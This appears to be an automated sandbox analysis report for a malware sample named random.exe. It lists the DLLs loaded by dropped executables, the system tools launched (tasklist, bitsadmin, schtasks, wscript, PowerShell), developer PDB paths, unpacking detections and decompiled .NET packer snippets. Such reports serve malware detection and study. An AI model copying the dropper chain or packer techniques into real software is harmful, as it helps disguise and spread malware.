Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\expand.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\fltMC.exe	Section loaded: fltlib.dll
Source: C:\Windows\SysWOW64\fltMC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\bitsadmin.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll

Source: C:\Users\user\Desktop\random.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: random.exe

Static file information: File size 1962496 > 1048576

Source: random.exe

Static PE information: Raw size of zmpqmbag is bigger than: 0x100000 < 0x1ade00

Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb source: PfOHmro.exe, 00000010.00000000.1471258251.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Administrator\Desktop\2023CryptsDone\WinFormProject-master\obj\Debug\Aml.pdb source: rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, mIrI3a9.exe, 00000034.00000000.1645079529.0000000000912000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\Users\Hand1\source\repos\Portals\Portals\obj\Release\Portals.pdb<;V; H;_CorExeMainmscoree.dll source: PfOHmro.exe, 00000010.00000000.1471258251.0000000000E92000.00000002.00000001.01000000.0000000B.sdmp, PfOHmro.exe, 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\random.exe	Unpacked PE file: 0.2.random.exe.e00000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 1.2.rapes.exe.d80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 2.2.rapes.exe.d80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Unpacked PE file: 11.2.rapes.exe.d80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zmpqmbag:EW;jncfbsbi:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: mAtJWNv[1].exe.11.dr, Ce716WgjPJi1to0DwO.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})
Source: mAtJWNv.exe.11.dr, Ce716WgjPJi1to0DwO.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{lMyWdMdzSHL952Z0EGd(typeof(IntPtr).TypeHandle),lMyWdMdzSHL952Z0EGd(typeof(Type).TypeHandle)})

.NET source code contains potential unpacker

Source: mAtJWNv[1].exe.11.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: NA4BaGdVL2
Source: mAtJWNv[1].exe.11.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: D0mHsQPh9h
Source: mAtJWNv.exe.11.dr, RhN4VuXG0bkU6RkQbjv.cs	.Net Code: NA4BaGdVL2
